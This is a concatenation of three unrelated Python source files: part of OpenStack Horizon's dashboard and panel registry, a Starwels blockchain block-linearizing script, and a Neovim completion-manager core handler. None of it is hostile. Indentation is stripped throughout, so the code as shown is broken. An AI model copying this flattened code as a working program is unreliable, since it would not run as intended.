providing role-based access control.
.. attribute:: name
The name of the panel. This will be displayed in the
auto-generated navigation and various other places.
Default: ``''``.
.. attribute:: slug
A unique "short name" for the panel. The slug is used as
a component of the URL path for the panel. Default: ``''``.
.. attribute: roles
A list of role names, all of which a user must possess in order
to access any view associated with this panel. This attribute
is combined cumulatively with any roles required on the
``Dashboard`` class with which it is registered.
.. attribute:: urls
Path to a URLconf of views for this panel using dotted Python
notation. If no value is specified, a file called ``urls.py``
living in the same package as the ``panel.py`` file is used.
Default: ``None``.
.. attribute:: nav
.. method:: nav(context)
The ``nav`` attribute can be either boolean value or a callable
which accepts a ``RequestContext`` object as a single argument
to control whether or not this panel should appear in
automatically-generated navigation. Default: ``True``.
"""
name = ''
slug = ''
urls = None
nav = True
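    # A minimal sketch of a concrete panel, shown as a comment because real
    # panels live in their own ``panel.py`` modules; the names used here are
    # hypothetical, and ``SomeDashboard`` is assumed to already be registered
    # with the site:
    #
    #   class Instances(horizon.Panel):
    #       name = "Instances"
    #       slug = 'instances'
    #       roles = ('admin',)
    #
    #   SomeDashboard.register(Instances)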
def __repr__(self):
return "<Panel: %s>" % self.__unicode__()
def get_absolute_url(self):
""" Returns the default URL for this panel.
The default URL is defined as the URL pattern with ``name="index"`` in
the URLconf for this panel.
"""
return reverse('horizon:%s:%s:index' % (self._registered_with.slug,
self.slug,))
@property
def _decorated_urls(self):
urlpatterns = self._get_default_urlpatterns()
# Apply access controls to all views in the patterns
roles = getattr(self, 'roles', [])
_decorate_urlconf(urlpatterns, require_roles, roles)
_decorate_urlconf(urlpatterns, _current_component, panel=self)
# Return the three arguments to django.conf.urls.defaults.include
return urlpatterns, self.slug, self.slug
class Dashboard(Registry, HorizonComponent):
""" A base class for defining Horizon dashboards.
All Horizon dashboards should extend from this base class. It provides the
appropriate hooks for automatic discovery of :class:`~horizon.Panel`
modules, automatically constructing URLconfs, and providing role-based
access control.
.. attribute:: name
The name of the dashboard. This will be displayed in the
auto-generated navigation and various other places.
Default: ``''``.
.. attribute:: slug
A unique "short name" for the dashboard. The slug is used as
a component of the URL path for the dashboard. Default: ``''``.
.. attribute:: panels
The ``panels`` attribute can be either a list containing the name
of each panel module which should be loaded as part of this
        dashboard, or a dictionary of tuples which define groups of panels,
as in the following example::
class Syspanel(horizon.Dashboard):
panels = {'System Panel': ('overview', 'instances', ...)}
Automatically generated navigation will use the order of the
modules in this attribute. Default: ``[]``.
Panel modules must be listed in ``panels`` in order to be
discovered by the automatic registration mechanism.
.. attribute:: default_panel
The name of the panel which should be treated as the default
panel for the dashboard, i.e. when you visit the root URL
for this dashboard, that's the panel that is displayed.
Default: ``None``.
.. attribute: roles
A list of role names, all of which a user must possess in order
to access any panel registered with this dashboard. This attribute
is combined cumulatively with any roles required on individual
:class:`~horizon.Panel` classes.
.. attribute:: urls
Optional path to a URLconf of additional views for this dashboard
which are not connected to specific panels. Default: ``None``.
.. attribute:: nav
Optional boolean to control whether or not this dashboard should
appear in automatically-generated navigation. Default: ``True``.
.. attribute:: supports_tenants
Optional boolean that indicates whether or not this dashboard includes
support for projects/tenants. If set to ``True`` this dashboard's
        navigation will include a UI element that allows the user to select
project/tenant. Default: ``False``.
"""
_registerable_class = Panel
name = ''
slug = ''
urls = None
panels = []
default_panel = None
nav = True
supports_tenants = False
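    # A minimal sketch of a concrete dashboard (slug and panel names are
    # hypothetical); ``panels`` names the panel modules to auto-discover and
    # ``default_panel`` is the one served at the dashboard's root URL:
    #
    #   class Syspanel(horizon.Dashboard):
    #       name = "System Panel"
    #       slug = 'syspanel'
    #       panels = ('overview', 'instances')
    #       default_panel = 'overview'
    #       roles = ('admin',)
    #
    #   horizon.register(Syspanel)  # assuming the usual module-level Horizon site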
def __repr__(self):
return "<Dashboard: %s>" % self.__unicode__()
def get_panel(self, panel):
"""
Returns the specified :class:`~horizon.Panel` instance registered
with this dashboard.
"""
return self._registered(panel)
def get_panels(self):
"""
Returns the :class:`~horizon.Panel` instances registered with this
dashboard in order.
"""
registered = copy.copy(self._registry)
if type(self.panels) is dict:
panels = {}
for heading, items in self.panels.iteritems():
panels.setdefault(heading, [])
for item in items:
panel = self._registered(item)
panels[heading].append(panel)
registered.pop(panel.__class__)
if len(registered):
panels.setdefault(_("Other"), []).extend(registered.values())
else:
panels = []
for item in self.panels:
panel = self._registered(item)
panels.append(panel)
registered.pop(panel.__class__)
panels.extend(registered.values())
return panels
def get_absolute_url(self):
""" Returns the default URL for this dashboard.
The default URL is defined as the URL pattern with ``name="index"``
in the URLconf for the :class:`~horizon.Panel` specified by
:attr:`~horizon.Dashboard.default_panel`.
"""
return self._registered(self.default_panel).get_absolute_url()
@property
def _decorated_urls(self):
urlpatterns = self._get_default_urlpatterns()
self._autodiscover()
default_panel = None
# Add in each panel's views except for the default view.
for panel in self._registry.values():
if panel.slug == self.default_panel:
default_panel = panel
continue
urlpatterns += patterns('',
url(r'^%s/' % panel.slug, include(panel._decorated_urls)))
# Now the default view, which should come last
if not default_panel:
raise NotRegistered('The default panel "%s" is not registered.'
% self.default_panel)
urlpatterns += patterns('',
url(r'', include(default_panel._decorated_urls)))
# Apply access controls to all views in the patterns
roles = getattr(self, 'roles', [])
_decorate_urlconf(urlpatterns, require_roles, roles)
_decorate_urlconf(urlpatterns, _current_component, dashboard=self)
# Return the three arguments to django.conf.urls.defaults.include
return urlpatterns, self.slug, self.slug
def _autodiscover(self):
""" Discovers panels to register from the current dashboard module. """
package = '.'.join(self.__module__.split('.')[:-1])
mod = import_module(package)
panels = []
if type(self.panels) is dict:
[panels.extend(values) for values in self.panels.values()]
else:
panels = self.panels
for panel in panels:
try:
before_import_registry = copy.copy(self._registry)
import_module('.%s.panel' % panel, package)
except:
self._registry = before_import_registry
if module_has_submodule(mod, panel):
raise
@classmethod
def register(cls, panel):
""" Registers a :class:`~horizon.Panel` with this dashboard. """
from horizon import Horizon
return Horizon.register_panel(cls, panel)
@classmethod
def unregister(cls, panel):
""" Unregisters a :class:`~horizon.Panel` from this dashboard. """
from horizon import Horizon
return Horizon.unregister_panel(cls, panel)
class Workflow(object):
def __init__(*args, **kwargs):
raise NotImplementedError()
class LazyURLPattern(SimpleLazyObject):
def __iter__(self):
if self._wrapped is None:
self._setup()
return iter(self._wrapped)
def __reversed__(self):
if self._wrapped is None:
self._setup()
return reversed(self._wrapped)
class Site(Registry, HorizonComponent):
""" The core OpenStack Dashboard class. """
# Required for registry
_registerable_class = Dashboard
name = "Horizon"
namespace = 'horizon'
slug = 'horizon'
urls = 'horizon.site_urls'
def __repr__(self):
return u"<Site: %s>" % self.__unicode__()
@property
def _conf(self):
conf = copy.copy(HORIZON_CONFIG)
conf.update(getattr(settings, 'HORIZON_CONFIG', {}))
return conf
@property
def dashboards(self):
return self._conf['dashboards']
@property
def default_dashboard(self):
return self._conf['default_dashboard']
def register(self, dashboard):
""" Registers a :class:`~horizon.Dashboard` with Horizon."""
return self._register(dashboard)
def unregister(self, dashboard):
""" Unregisters a :class:`~horizon.Dashboard` from Horizon. """
return self._unregister(dashboard)
def registered(self, dashboard):
return self._registered(dashboard)
def register_panel(self, dashboard, panel):
dash_instance = self.registered(dashboard)
return dash_instance._register(panel)
def unregister_panel(self, dashboard, panel):
dash_instance = self.registered(dashboard)
if not dash_instance:
raise NotRegistered("The dashboard %s is not registered."
% dashboard)
return dash_instance._unregister(panel)
def get_dashboard(self, dashboard):
""" Returns the specified :class:`~horizon.Dashboard` instance. """
return self._registered(dashboard)
def get_dashboards(self):
""" Returns an ordered tuple of :class:`~horizon.Dashboard` modules.
Orders dashboards according to the ``"dashboards"`` key in
``settings.HORIZON_CONFIG`` or else returns all registered dashboards
in alphabetical order.
Any remaining :class:`~horizon.Dashboard` classes registered with
Horizon but not listed in ``settings.HORIZON_CONFIG['dashboards']``
will be appended to the end of the list alphabetically.
"""
if self.dashboards:
registered = copy.copy(self._registry)
dashboards = []
for item in self.dashboards:
dashboard = self._registered(item)
dashboards.append(dashboard)
registered.pop(dashboard.__class__)
if len(registered):
extra = registered.values()
extra.sort()
dashboards.extend(extra)
return dashboards
else:
dashboards = self._registry.values()
dashboards.sort()
return dashboards
def get_default_dashboard(self):
""" Returns the default :class:`~horizon.Dashboard` instance.
If ``"default_dashboard"`` is specified in ``settings.HORIZON_CONFIG``
then that dashboard will be returned. If not, the first dashboard
returned by :func:`~horizon.get_dashboards` will be returned.
"""
if self.default_dashboard:
return self._registered(self.default_dashboard)
elif len(self._registry):
return self.get_dashboards()[0]
else:
raise NotRegistered("No dashboard modules have been registered.")
def get_user_home(self, user):
""" Returns the default URL for a particular user.
This method can be used to customize where a user is sent when
they log in, etc. By default it returns the value of
:meth:`get_absolute_url`.
An alternative function can be supplied to customize this behavior
by specifying a either a URL or a function which returns a URL via
the ``"user_home"`` key in ``settings.HORIZON_CONFIG``. Each of these
would be valid::
{"user_home": "/home",} # A URL
{"user_home": "my_module.get_user_home",} # Path to a function
{"user_home": lambda user: "/" + user.name,} # A function
This can be useful if the default dashboard may not be accessible
to all users.
"""
user_home = self._conf['user_home']
if user_home:
if callable(user_home):
return user_home(user)
elif isinstance(user_home, basestring):
# Assume we've got a URL if there's a slash in it
if user_home.find("/") != -1:
return user_home
else:
mod, func = user_home.rsplit(".", 1)
return getattr(import_module(mod), func)(user)
# If it's not callable and not a string, it's wrong.
raise ValueError('The user_home setting must be either a string '
'or a callable object (e.g. a function).')
else:
return self.get_absolute_url()
def get_absolute_url(self):
""" Returns the default URL for Horizon's URLconf.
The default URL is determined by calling
:meth:`~horizon.Dashboard.get_absolute_url`
on the :class:`~horizon.Dashboard` instance returned by
:meth:`~horizon.get_default_dashboard`.
"""
return self.get_default_dashboard().get_absolute_url()
@property
def _lazy_urls(self):
""" Lazy loading for URL patterns.
This method avoids problems associated with attempting to evaluate
        the URLconf before the settings module has been loaded.
"""
def url_patterns():
return self._urls()[0]
return LazyURLPattern(url_patterns), self.namespace, self.slug
def _urls(self):
""" Constructs the URLconf for Horizon from registered Dashboards. """
urlpatterns = self._get_default_urlpatterns()
self._autodiscover()
# Add in each dashboard's views.
for dash in self._registry.values():
urlpatterns += patterns('',
url(r'^%s/' % dash.slug, include(dash._decorated_urls)))
# Return the three arguments to django.conf.urls.defaults.include
return urlpatterns, self.namespace, self.slug
def _autodiscover(self):
""" Discovers modules to register from ``settings.INSTALLED_APPS``.
This makes sure that the appropriate modules get imported to register
themselves with Horizon.
"""
if not getattr(self, '_registerable_class', None):
raise ImproperlyConfigured('You must set a '
'"_registerable_class" property '
'in order to use autodiscovery.')
# Discover both dashboards and panels, in that order
for mod_name in ('dashboard', 'panel'):
for app in settings.INSTALLED_APPS:
mod = import_module(app)
try:
before_import_registry = copy.copy(self._registry)
import_module('%s.%s' % (app, mod_name))
except:
self._registry = before_import_registry
if module_has_submodule(mod, mod_name):
raise
# The one true Horizon
Horizon = Site()
|
|
#!/usr/bin/env python3
#
# linearize-data.py: Construct a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2019 The Starwels developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from __future__ import print_function, division
import struct
import re
import os
import os.path
import sys
import hashlib
import datetime
import time
from collections import namedtuple
from binascii import hexlify, unhexlify
settings = {}
##### Switch endian-ness #####
def hex_switchEndian(s):
""" Switches the endianness of a hex string (in pairs of hex chars) """
pairList = [s[i:i+2].encode() for i in range(0, len(s), 2)]
return b''.join(pairList[::-1]).decode()
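# Illustrative example (not part of the original logic): the hex pairs are
# reversed as a unit, so hex_switchEndian('f9beb4d9') returns 'd9b4bef9'.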
def uint32(x):
return x & 0xffffffff
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return b''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return b''.join(out_words)
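# Note (added for clarity): bufreverse() reverses the bytes within each 32-bit
# word and wordreverse() reverses the order of the words; applied together they
# reverse all 32 bytes of a SHA-256 digest, which is how calc_hash_str() below
# produces the conventional big-endian hex form of a block hash.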
def calc_hdr_hash(blk_hdr):
hash1 = hashlib.sha256()
hash1.update(blk_hdr)
hash1_o = hash1.digest()
hash2 = hashlib.sha256()
hash2.update(hash1_o)
hash2_o = hash2.digest()
return hash2_o
def calc_hash_str(blk_hdr):
hash = calc_hdr_hash(blk_hdr)
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hexlify(hash).decode('utf-8')
return hash_str
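# A serialized block header is 80 bytes: version (4) | previous block hash (32)
# | merkle root (32) | nTime (4) | nBits (4) | nonce (4). get_blk_dt() therefore
# reads the little-endian timestamp at byte offset 68.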
def get_blk_dt(blk_hdr):
members = struct.unpack("<I", blk_hdr[68:68+4])
nTime = members[0]
dt = datetime.datetime.fromtimestamp(nTime)
dt_ym = datetime.datetime(dt.year, dt.month, 1)
return (dt_ym, nTime)
# When getting the list of block hashes, undo any byte reversals.
def get_block_hashes(settings):
blkindex = []
f = open(settings['hashlist'], "r")
for line in f:
line = line.rstrip()
if settings['rev_hash_bytes'] == 'true':
line = hex_switchEndian(line)
blkindex.append(line)
print("Read " + str(len(blkindex)) + " hashes")
return blkindex
# The block map shouldn't give or receive byte-reversed hashes.
def mkblockmap(blkindex):
blkmap = {}
for height,hash in enumerate(blkindex):
blkmap[hash] = height
return blkmap
# Block header and extent on disk
BlockExtent = namedtuple('BlockExtent', ['fn', 'offset', 'inhdr', 'blkhdr', 'size'])
class BlockDataCopier:
def __init__(self, settings, blkindex, blkmap):
self.settings = settings
self.blkindex = blkindex
self.blkmap = blkmap
self.inFn = 0
self.inF = None
self.outFn = 0
self.outsz = 0
self.outF = None
self.outFname = None
self.blkCountIn = 0
self.blkCountOut = 0
self.lastDate = datetime.datetime(2000, 1, 1)
self.highTS = 1408893517 - 315360000
self.timestampSplit = False
self.fileOutput = True
self.setFileTime = False
self.maxOutSz = settings['max_out_sz']
if 'output' in settings:
self.fileOutput = False
if settings['file_timestamp'] != 0:
self.setFileTime = True
if settings['split_timestamp'] != 0:
self.timestampSplit = True
# Extents and cache for out-of-order blocks
self.blockExtents = {}
self.outOfOrderData = {}
self.outOfOrderSize = 0 # running total size for items in outOfOrderData
def writeBlock(self, inhdr, blk_hdr, rawblock):
blockSizeOnDisk = len(inhdr) + len(blk_hdr) + len(rawblock)
if not self.fileOutput and ((self.outsz + blockSizeOnDisk) > self.maxOutSz):
self.outF.close()
if self.setFileTime:
os.utime(self.outFname, (int(time.time()), self.highTS))
self.outF = None
self.outFname = None
self.outFn = self.outFn + 1
self.outsz = 0
(blkDate, blkTS) = get_blk_dt(blk_hdr)
if self.timestampSplit and (blkDate > self.lastDate):
print("New month " + blkDate.strftime("%Y-%m") + " @ " + self.hash_str)
self.lastDate = blkDate
if self.outF:
self.outF.close()
if self.setFileTime:
os.utime(self.outFname, (int(time.time()), self.highTS))
self.outF = None
self.outFname = None
self.outFn = self.outFn + 1
self.outsz = 0
if not self.outF:
if self.fileOutput:
self.outFname = self.settings['output_file']
else:
self.outFname = os.path.join(self.settings['output'], "blk%05d.dat" % self.outFn)
print("Output file " + self.outFname)
self.outF = open(self.outFname, "wb")
self.outF.write(inhdr)
self.outF.write(blk_hdr)
self.outF.write(rawblock)
self.outsz = self.outsz + len(inhdr) + len(blk_hdr) + len(rawblock)
self.blkCountOut = self.blkCountOut + 1
if blkTS > self.highTS:
self.highTS = blkTS
if (self.blkCountOut % 1000) == 0:
print('%i blocks scanned, %i blocks written (of %i, %.1f%% complete)' %
(self.blkCountIn, self.blkCountOut, len(self.blkindex), 100.0 * self.blkCountOut / len(self.blkindex)))
def inFileName(self, fn):
return os.path.join(self.settings['input'], "blk%05d.dat" % fn)
def fetchBlock(self, extent):
'''Fetch block contents from disk given extents'''
with open(self.inFileName(extent.fn), "rb") as f:
f.seek(extent.offset)
return f.read(extent.size)
def copyOneBlock(self):
'''Find the next block to be written in the input, and copy it to the output.'''
extent = self.blockExtents.pop(self.blkCountOut)
if self.blkCountOut in self.outOfOrderData:
# If the data is cached, use it from memory and remove from the cache
rawblock = self.outOfOrderData.pop(self.blkCountOut)
self.outOfOrderSize -= len(rawblock)
else: # Otherwise look up data on disk
rawblock = self.fetchBlock(extent)
self.writeBlock(extent.inhdr, extent.blkhdr, rawblock)
def run(self):
while self.blkCountOut < len(self.blkindex):
if not self.inF:
fname = self.inFileName(self.inFn)
print("Input file " + fname)
try:
self.inF = open(fname, "rb")
except IOError:
print("Premature end of block data")
return
inhdr = self.inF.read(8)
            # A null first byte marks padding at the end of a blk file; note
            # that inhdr is bytes under Python 3, so compare against the int 0.
            if not inhdr or inhdr[0] == 0:
self.inF.close()
self.inF = None
self.inFn = self.inFn + 1
continue
inMagic = inhdr[:4]
if (inMagic != self.settings['netmagic']):
print("Invalid magic: " + hexlify(inMagic).decode('utf-8'))
return
inLenLE = inhdr[4:]
su = struct.unpack("<I", inLenLE)
inLen = su[0] - 80 # length without header
blk_hdr = self.inF.read(80)
inExtent = BlockExtent(self.inFn, self.inF.tell(), inhdr, blk_hdr, inLen)
self.hash_str = calc_hash_str(blk_hdr)
            if self.hash_str not in self.blkmap:
                # Because blocks can be written to files out-of-order as of 0.10, the script
                # may encounter blocks it doesn't know about. Treat as debug output.
                if self.settings['debug_output'] == 'true':
print("Skipping unknown block " + self.hash_str)
self.inF.seek(inLen, os.SEEK_CUR)
continue
blkHeight = self.blkmap[self.hash_str]
self.blkCountIn += 1
if self.blkCountOut == blkHeight:
# If in-order block, just copy
rawblock = self.inF.read(inLen)
self.writeBlock(inhdr, blk_hdr, rawblock)
# See if we can catch up to prior out-of-order blocks
while self.blkCountOut in self.blockExtents:
self.copyOneBlock()
else: # If out-of-order, skip over block data for now
self.blockExtents[blkHeight] = inExtent
if self.outOfOrderSize < self.settings['out_of_order_cache_sz']:
# If there is space in the cache, read the data
# Reading the data in file sequence instead of seeking and fetching it later is preferred,
# but we don't want to fill up memory
self.outOfOrderData[blkHeight] = self.inF.read(inLen)
self.outOfOrderSize += inLen
else: # If no space in cache, seek forward
self.inF.seek(inLen, os.SEEK_CUR)
print("Done (%i blocks written)" % (self.blkCountOut))
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: linearize-data.py CONFIG-FILE")
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
        m = re.search(r'^\s*#', line)
if m:
continue
# parse key=value lines
        m = re.search(r'^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
# Force hash byte format setting to be lowercase to make comparisons easier.
# Also place upfront in case any settings need to know about it.
if 'rev_hash_bytes' not in settings:
settings['rev_hash_bytes'] = 'false'
settings['rev_hash_bytes'] = settings['rev_hash_bytes'].lower()
if 'netmagic' not in settings:
settings['netmagic'] = 'f9beb4d9'
if 'genesis' not in settings:
settings['genesis'] = '000000003d69a915e9da53348c5c272978bb743442e3a6341c11061c125811a2'
if 'input' not in settings:
settings['input'] = 'input'
if 'hashlist' not in settings:
settings['hashlist'] = 'hashlist.txt'
if 'file_timestamp' not in settings:
settings['file_timestamp'] = 0
if 'split_timestamp' not in settings:
settings['split_timestamp'] = 0
if 'max_out_sz' not in settings:
settings['max_out_sz'] = 1000 * 1000 * 1000
if 'out_of_order_cache_sz' not in settings:
settings['out_of_order_cache_sz'] = 100 * 1000 * 1000
if 'debug_output' not in settings:
settings['debug_output'] = 'false'
settings['max_out_sz'] = int(settings['max_out_sz'])
settings['split_timestamp'] = int(settings['split_timestamp'])
settings['file_timestamp'] = int(settings['file_timestamp'])
settings['netmagic'] = unhexlify(settings['netmagic'].encode('utf-8'))
settings['out_of_order_cache_sz'] = int(settings['out_of_order_cache_sz'])
settings['debug_output'] = settings['debug_output'].lower()
if 'output_file' not in settings and 'output' not in settings:
print("Missing output file / directory")
sys.exit(1)
blkindex = get_block_hashes(settings)
blkmap = mkblockmap(blkindex)
# Block hash map won't be byte-reversed. Neither should the genesis hash.
if not settings['genesis'] in blkmap:
print("Genesis block not found in hashlist")
else:
BlockDataCopier(settings, blkindex, blkmap).run()
|
|
# -*- coding: utf-8 -*-
# For debugging
# NVIM_PYTHON_LOG_FILE=nvim.log NVIM_PYTHON_LOG_LEVEL=INFO nvim
import sys
import os
import re
import copy
import importlib
import cm
import subprocess
import time
import cm_default
import threading
import json
logger = cm.getLogger(__name__)
# use a trick to only register the source without loading the entire module
class CmSkipLoading(Exception):
pass
class CoreHandler(cm.Base):
def __init__(self,nvim):
super().__init__(nvim)
# process control information on channels
self._channel_processes = {}
self._channel_threads = {}
        # {'source_name': {'startcol': ..., 'matches': [...], ...}}
self._matches = {}
self._sources = {}
self._subscope_detectors = {}
self._last_startcol = 0
self._last_matches = []
        # initially True so the popup menu can be displayed directly without a cm_refresh
self._has_popped_up = True
self._complete_timer = None
self._last_ctx = None
self._loaded_modules = {}
def cm_setup(self):
# after all sources are registered, so that all channels will be
# started the first time cm_start_channels is called
self.nvim.call('cm#_core_channel_started', self.nvim.channel_id, async=True)
# load configurations
self._servername = self.nvim.vars['_cm_servername']
self._start_py = self.nvim.vars['_cm_start_py_path']
self._py3 = self.nvim.vars['_cm_py3']
self._py2 = self.nvim.eval("get(g:,'python_host_prog','python2')")
self._complete_delay = self.nvim.vars['cm_complete_popup_delay']
self._completed_snippet_enable = self.nvim.vars['cm_completed_snippet_enable']
self._completed_snippet_engine = self.nvim.vars['cm_completed_snippet_engine']
self._multi_thread = int(self.nvim.vars['cm_multi_threading'])
self.cm_detect_modules()
def cm_detect_modules(self):
cm.sync_rtp(self.nvim)
self._detect_sources()
self._load_scopers()
def _load_scopers(self):
scoper_paths = self.nvim.eval("globpath(&rtp,'pythonx/cm_scopers/*.py',1)").split("\n")
# auto find scopers
for path in scoper_paths:
if not path:
continue
try:
modulename = os.path.splitext(os.path.basename(path))[0]
modulename = "cm_scopers.%s" % modulename
if modulename in self._loaded_modules:
continue
self._loaded_modules[modulename] = True
m = importlib.import_module(modulename)
scoper = m.Scoper(self.nvim)
for scope in scoper.scopes:
if scope not in self._subscope_detectors:
self._subscope_detectors[scope] = []
self._subscope_detectors[scope].append(scoper)
logger.info('scoper <%s> imported for %s', modulename, scope)
except Exception as ex:
logger.exception('importing scoper <%s> failed: %s', modulename, ex)
logger.info('_subscope_detectors: %s', self._subscope_detectors)
def _detect_sources(self):
# auto find sources
sources_paths = self.nvim.eval("globpath(&rtp,'pythonx/cm_sources/*.py',1)").split("\n")
for path in sources_paths:
modulename = os.path.splitext(os.path.basename(path))[0]
modulename = "cm_sources.%s" % modulename
if modulename in self._loaded_modules:
continue
            # use a trick to only register the source without loading the entire module
def register_source(name,abbreviation,priority,enable=True,events=[],python='python3',multi_thread=None,**kwargs):
channel = dict(type=python,
module=modulename,
events=events)
if not multi_thread is None:
channel['multi_thread'] = multi_thread
source = {}
source['channel'] = channel
source['name'] = name
source['priority'] = priority
source['enable'] = enable
source['abbreviation'] = abbreviation
for k in kwargs:
source[k] = kwargs[k]
logger.info('registering source: %s',source)
self.nvim.call('cm#register_source', source, async=True)
                # use a trick to only register the source without loading the entire module
raise CmSkipLoading()
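            # Illustrative only (hypothetical names): a pythonx/cm_sources/*.py
            # module calls something like
            #   register_source(name='cm-example', abbreviation='Ex',
            #                   priority=5, scopes=['python'])
            # at import time; the temporary hook above records the source and
            # raises CmSkipLoading so the rest of the module is never executed.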
old_handler = cm.register_source
cm.register_source = register_source
try:
# register_source
m = importlib.import_module(modulename)
except CmSkipLoading:
# This is not an error
logger.info('source <%s> registered', modulename)
except Exception as ex:
logger.exception("register_source for %s failed", modulename)
finally:
# restore
cm.register_source = old_handler
def _is_kw_futher_typing(self,info,oldctx,curctx):
old_typed = oldctx['typed']
cur_typed = curctx['typed']
old_len = len(old_typed)
cur_len = len(cur_typed)
if cur_len < old_len:
return False
tmp_ctx1 = copy.deepcopy(oldctx)
tmp_ctx2 = copy.deepcopy(curctx)
if not self._check_refresh_patterns(info,tmp_ctx1,True):
logger.debug('oldctx _check_refresh_patterns failed')
return False
if not self._check_refresh_patterns(info,tmp_ctx2,True):
logger.debug('curctx _check_refresh_patterns failed')
return False
logger.debug('old ctx [%s] cur ctx [%s]', tmp_ctx1, tmp_ctx2)
# startcol is set in self._check_refresh_patterns
return tmp_ctx1['startcol'] == tmp_ctx2['startcol']
def cm_complete(self,srcs,name,ctx,startcol,matches,refresh,outdated,current_ctx):
if isinstance(name,dict):
name = name['name']
if name not in srcs:
logger.error("invalid completion source name [%s]", name)
return
info = srcs[name]
        # be careful when the context of the completion matches is outdated
if outdated:
logger.info("[%s] outdated matches, old typed [%s] cur typed[%s]", name, ctx['typed'], current_ctx['typed'])
if refresh:
logger.info("[%s] ignore outdated matching refresh=1", name)
return
if not self._is_kw_futher_typing(info,ctx,current_ctx):
logger.info("[%s] matches is outdated. ignore them.", name)
return
logger.info("[%s] matches is outdated by keyword further typing. I'm gonna keep it.", name)
# adjust for subscope
if ctx['lnum']==1:
startcol += ctx.get('scope_col',1)-1
self._sources = srcs
try:
            # process the matches early to eliminate unnecessary complete function calls
result = self.process_matches(name,ctx,startcol,matches)
logger.debug('<%s> preprocessing result startcol: %s matches: %s', name, startcol, result)
if (not result) and (not self._matches.get(name,{}).get('last_matches',[])):
# not popping up, ignore this request
logger.debug('Not popping up, not refreshing for cm_complete by %s, startcol %s', name, startcol)
return
finally:
# storing matches
if name not in self._matches:
self._matches[name] = {}
if len(matches)==0:
del self._matches[name]
else:
complete_info = self._matches[name]
complete_info['startcol'] = startcol
complete_info['refresh'] = refresh
complete_info['matches'] = matches
complete_info['context'] = ctx
if outdated and complete_info.get('enable',False):
# outdated, but it is keyword further typing, do not
# override the already enabled matches
complete_info['enable'] = True
else:
complete_info['enable'] = not ctx.get('early_cache',False)
# wait for _complete_timeout, reduce flashes
if self._has_popped_up:
logger.info("update popup for [%s]",name)
            # the ctx parameter may be a subctx for the completion source; use
            # nvim.call to get the root context
self._refresh_completions(self.nvim.call('cm#context'))
else:
logger.debug("delay popup for [%s]",name)
def cm_insert_enter(self):
self._matches = {}
self._last_matches = []
self._last_startcol = 0
# complete timer
self._last_ctx = None
if self._complete_timer:
self._complete_timer.cancel()
self._complete_timer = None
def _on_complete_timeout(self,srcs,ctx,*args):
if self._last_ctx!=ctx:
            logger.warning("_on_complete_timeout triggered, but last_ctx is %s, param ctx is %s", self._last_ctx, ctx)
return
if not self._has_popped_up:
self._refresh_completions(ctx)
self._has_popped_up = True
else:
logger.debug("ignore _on_complete_timeout for self._has_popped_up")
def cm_refresh(self,srcs,root_ctx,force=0,*args):
root_ctx['scope'] = root_ctx['filetype']
root_ctx['force'] = force
# complete delay timer
self._last_ctx = root_ctx
self._has_popped_up = False
if self._complete_timer:
self._complete_timer.cancel()
self._complete_timer = None
        # Note: get_src() asks neovim for data, during which another greenlet
        # coroutine could start or run, so calculate this as early as possible
        # to avoid concurrency issues.
ctx_list = self._get_ctx_list(root_ctx)
self._sources = srcs
if force:
            # if this is a forced refresh, clear the cached variables to avoid
            # being filtered out by the self._complete function
self._last_matches = []
self._last_startcol = 0
# simple complete done
if root_ctx['typed'] == '':
self._matches = {}
elif re.match(r'\s',root_ctx['typed'][-1]):
self._matches = {}
# do notify_sources_to_refresh
refreshes_calls = []
refreshes_channels = []
# get the sources that need to be notified
for ctx_item in ctx_list:
for name in srcs:
ctx = copy.deepcopy(ctx_item)
ctx['early_cache'] = False
ctx['force'] = force
info = srcs[name]
if not info['enable']:
# ignore disabled source
continue
try:
if not self._check_scope(ctx,info):
logger.debug('_check_scope ignore <%s> for context scope <%s>', name, ctx['scope'])
continue
if not force and not info['auto_popup']:
logger.debug('<%s> is not auto_popup', name)
continue
# refresh patterns
if not self._check_refresh_patterns(info,ctx,force):
if not force and info['early_cache'] and self._check_refresh_patterns(info,ctx,True):
# early cache
ctx['early_cache'] = True
logger.debug('<%s> early_caching', name)
else:
logger.debug('cm_refresh ignore <%s>, force[%s] early_cache[%s]', name, force, info['early_cache'])
if name in self._matches:
self._matches[name]['enable'] = False
continue
else:
# enable cached
if name in self._matches:
self._matches[name]['enable'] = True
if (
(name in self._matches) and
not self._matches[name]['refresh'] and
not force and
self._matches[name]['startcol']==ctx['startcol'] and
ctx.get('match_end', '') == self._matches[name]['context'].get('match_end', '')
):
logger.debug('<%s> has been cached, <%s> candidates', name, len(self._matches[name]['matches']))
continue
if 'cm_refresh' in info:
refreshes_calls.append(dict(name=name, context=ctx))
# start channels on demand here
if 'channel' in info:
channel = info['channel']
if 'id' not in channel:
self._start_channel(info)
channel = info.get('channel',{})
if 'id' in channel:
refreshes_channels.append(dict(name=name, id=channel['id'], context=ctx))
except Exception as ex:
logger.exception('cm_refresh exception: %s', ex)
continue
if not refreshes_calls and not refreshes_channels:
logger.info('not notifying any channels, _refresh_completions now')
self._refresh_completions(root_ctx)
self._has_popped_up = True
else:
logger.info('notify_sources_to_refresh calls cnt [%s], channels cnt [%s]',len(refreshes_calls),len(refreshes_channels))
logger.debug('cm#_notify_sources_to_refresh [%s] [%s] [%s]', [e['name'] for e in refreshes_calls], [e['name'] for e in refreshes_channels], root_ctx)
self.nvim.call('cm#_notify_sources_to_refresh', refreshes_calls, refreshes_channels, root_ctx, async=True)
# complete delay timer
def on_timeout():
self.nvim.async_call(self._on_complete_timeout, srcs, root_ctx)
self._complete_timer = threading.Timer(float(self._complete_delay)/1000, on_timeout )
self._complete_timer.start()
